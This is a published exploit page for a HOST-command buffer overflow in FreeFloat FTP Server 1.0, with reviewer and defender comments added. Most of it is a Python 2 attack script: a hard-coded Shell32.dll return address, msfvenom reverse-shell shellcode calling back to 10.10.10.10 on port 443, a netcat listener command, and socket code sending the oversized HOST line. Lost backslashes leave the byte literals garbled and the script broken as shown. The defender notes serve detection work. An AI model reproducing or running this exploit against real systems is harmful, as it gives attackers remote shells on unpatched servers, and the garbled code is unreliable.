
Freefloat FTP Server 1.0 HOST Buffer Overflow

Posted on 02 November 2016

#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server HOST Command Buffer Overflow Exploit
# Date: 30/10/2016
# Exploit Author: Cybernetic
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows XP Profesional SP3 ESP x86
# CVE : N/A
#
# Summary: proof-of-concept that opens a TCP connection to an FTP server on
# port 21, sends USER and PASS, and then sends a single HOST command whose
# argument is filler + a 4-byte value (`ret`) + a payload + padding.
# Written for Python 2 (print statements).
#
# NOTE(review): this copy lost its backslashes and line terminators when the
# page was extracted, so the literals below ("xC7...", 'x90', 'USER test ')
# are plain text, not the bytes the author wrote. The listing is kept exactly
# as it appears on the page.
#
# Defender notes:
#  - Network indicator: an FTP control-channel line whose HOST argument is
#    hundreds of bytes long. A legitimate HOST argument (RFC 7151) is a host
#    name, so a length limit on control-channel lines catches this class.
#  - Host indicator: the payload comment below names a reverse TCP shell to
#    port 443, so the FTP server process opening an outbound connection or
#    starting a command interpreter is worth alerting on.
#  - The technique relies on a fixed address in a system DLL; ASLR, which
#    Windows XP lacks, breaks that assumption.
#  - The page lists no CVE and names no fixed version, so treat 1.00 as
#    unpatched: keep it off reachable networks or replace it with a
#    maintained server.

# `os` and `sys` are imported but not used anywhere in the visible script.
import socket, os, sys

# Hard-coded address taken from a system DLL (author's note follows). The
# literal is the byte-reversed form of 7E6B31C7, i.e. little-endian order.
# It is tied to the exact OS build and language listed under "Tested on".
ret="xC7x31x6Bx7E" #Shell32.dll 7E6B31C7

#Metasploit Shellcode
#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b 'x00x0ax0d' -f c
#nc -lvp 443

#Send exploit
# Generated payload, per the msfvenom comment above. In this copy it is inert
# text because the escape backslashes are missing (see NOTE(review) at top).
shellcode=("xbbx89x62x48xdaxdbxdaxd9x74x24xf4x5ax33xc9xb1"
"x52x31x5ax12x03x5ax12x83x4bx66xaax2fxb7x8fxa8"
"xd0x47x50xcdx59xa2x61xcdx3exa7xd2xfdx35xe5xde"
"x76x1bx1dx54xfaxb4x12xddxb1xe2x1dxdexeaxd7x3c"
"x5cxf1x0bx9ex5dx3ax5exdfx9ax27x93x8dx73x23x06"
"x21xf7x79x9bxcax4bx6fx9bx2fx1bx8ex8axfex17xc9"
"x0cx01xfbx61x05x19x18x4fxdfx92xeax3bxdex72x23"
"xc3x4dxbbx8bx36x8fxfcx2cxa9xfaxf4x4ex54xfdxc3"
"x2dx82x88xd7x96x41x2ax33x26x85xadxb0x24x62xb9"
"x9ex28x75x6ex95x55xfex91x79xdcx44xb6x5dx84x1f"
"xd7xc4x60xf1xe8x16xcbxaex4cx5dxe6xbbxfcx3cx6f"
"x0fxcdxbex6fx07x46xcdx5dx88xfcx59xeex41xdbx9e"
"x11x78x9bx30xecx83xdcx19x2bxd7x8cx31x9ax58x47"
"xc1x23x8dxc8x91x8bx7exa9x41x6cx2fx41x8bx63x10"
"x71xb4xa9x39x18x4fx3ax86x75x4exdex6ex84x50x1f"
"xd4x01xb6x75x3ax44x61xe2xa3xcdxf9x93x2cxd8x84"
"x94xa7xefx79x5ax40x85x69x0bxa0xd0xd3x9axbfxce"
"x7bx40x2dx95x7bx0fx4ex02x2cx58xa0x5bxb8x74x9b"
"xf5xdex84x7dx3dx5ax53xbexc0x63x16xfaxe6x73xee"
"x03xa3x27xbex55x7dx91x78x0cxcfx4bxd3xe3x99x1b"
"xa2xcfx19x5dxabx05xecx81x1axf0xa9xbex93x94x3d"
"xc7xc9x04xc1x12x4ax34x88x3exfbxddx55xabxb9x83"
"x65x06xfdxbdxe5xa2x7ex3axf5xc7x7bx06xb1x34xf6"
"x17x54x3axa5x18x7d")

# Payload prefixed with 30 repetitions of the 'x90' literal.
shell= 'x90'*30 + shellcode

# HOST argument: 247 repetitions of filler, then `ret`, then `shell`, then
# 'x43' repeated (696 - len(shell)) times. A negative multiplier yields an
# empty string, so no padding is added if `shell` is longer than 696.
buffer='x41'*247 + ret + shell + 'x43'*(696-len(shell))

print "Sending Buffer"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# s.connect() returns None, so `connect` carries no information. The target
# address is the same 10.10.10.10 used as LHOST in the payload comment;
# presumably both are the author's lab placeholders.
connect=s.connect(('10.10.10.10',21))
# Every server reply is read and discarded; nothing checks that the login
# or any command was accepted.
s.recv(1024)
s.send('USER test ')
s.recv(1024)
s.send('PASS test ')
s.recv(1024)
# The oversized HOST line is the only non-routine traffic in the session.
s.send('HOST' +buffer+ ' ')
s.close()
# Printed unconditionally after the socket is closed; it does not confirm
# that anything happened on the server. The line break inside the literal
# is reproduced from the page and is presumably a wrapping artifact.
print "Attack Buffer 
Overflow Successfully Executed"

 
